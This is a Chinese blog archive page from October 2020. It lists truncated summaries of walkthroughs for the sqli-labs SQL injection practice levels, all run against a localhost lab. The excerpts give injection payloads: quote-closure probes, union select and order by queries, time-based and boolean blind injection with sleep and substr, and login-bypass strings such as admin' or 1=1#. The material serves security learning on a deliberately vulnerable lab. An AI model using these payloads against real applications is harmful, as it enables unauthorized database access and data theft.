10 2020 档案
摘要:利用单引号双引号进行测试 发现网页无回显,所以注入方式为盲注,并且测试结果需要用时间注入来验证 用万能语句进行测试,双引号无反应,单引号测试成功 123' or 1=1 # 利用时间注入测试 后续测试结果与之前相同 123'or if((database()='security'),sleep(0.
阅读全文
摘要:利用双引号测试报错成功,查看报错信息 在利用双引号进一步测试 123" order by 3 # 查看具体列内容时,发现网页未回显,所以需要配合时间注入进行测试 123" union select if((database()='security'),sleep(10),sleep(2)),null
阅读全文
摘要:使用 admin" order by 3# 进行测试 双引号闭合,但是显示报错 闭合的可能行为 " 或者") 或者")) 经测试,闭合符号为") 使用 123") union select database(),null # 测试结果: 后续脱库与之前相同 less13 13与12测试方法相同,符号
阅读全文
摘要:测试单引号双引号 单引号报错,之后测试列数,测试结果2列 ' order by 3 # 进行脱库,后续不赘述 ' union select database(),null # 万能密码 admin")or 1=1# admin" or 1=1# admin ')or 1=1#
阅读全文
摘要:Less 9 用单引、双引测试页面均无反应。先利用单引号闭合结合if sleep进行时间盲注 http://127.0.0.1/sqli-labs/Less-9/?id=1%27%20and%20if((substr(database(),1,1)=%27s%27),sleep(10),sleep(
阅读全文
摘要:输入其他符号,id=1 ?"?" 网页正常回显,输入' 时,系统报错,证明闭合符号为 ' 接着用 and 1=1 进行测试 在爆破过程中发现最后等于的值只能为数字,只能进行数字间比较 直接爆破 http://127.0.0.1/sqli-labs-master/less-7/ ?id=1' and
阅读全文
摘要:使用双引号测试 报错显示添加的 "多余,证明闭合符号为” http://127.0.0.1/sqli-labs-master/Less-6/?id=1%22%20and%201=1--+ 剩下的爆破过程与less5一致
阅读全文
摘要:使用单双引号进行测试,发现单引号可以闭合语句,但是进行脱库操作发现无回显,尝试Bool类型注入 http://127.0.0.1/sqli-labs-master/Less-5/?id=2%27%20and%201=1--+ 单字符爆破 利用substr函数进行单个字符尝试 http://127.0
阅读全文
摘要:与less3类似,查看报错信息 将报错信息分割 use near '"1"") LIMIT 0,1' at line 1 闭合符号为") http://127.0.0.1/sqli-labs/Less-4/?id=-1%22)%20union%20select%201,2,3--+ 后续与less一
阅读全文
摘要:注入方式和less1,2一样,重点需要查看报错语句 http://127.0.0.1/sqli-labs/Less-3/?id=2%27 报错中显示)证明闭合符号有 ') 接着进行注入测试,猜测列数 http://127.0.0.1/sqli-labs/Less-3/?id=2%27)%20orde
阅读全文
摘要:利用单引号和and 1=1测试 报错显示是符号问题,在--+后LIMIT0,1没有闭合符号,并且攻击添加的单引号没有参与闭合。证明id=1可能没有闭合符号,直接将结果返回给数据库 将单引号去掉测试 order by xx 猜测列数.结果3列 union select 测试注入点。2,3列可以注入参数
阅读全文
摘要:Less-1 利用'进行测试,后面跟or语句测试注入点,证明id字段可以注入 利用order by X 测试该表格几列数据,并测试第几列数据可以注入 爆库过程 库名 单独爆破 127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,(select schem
阅读全文
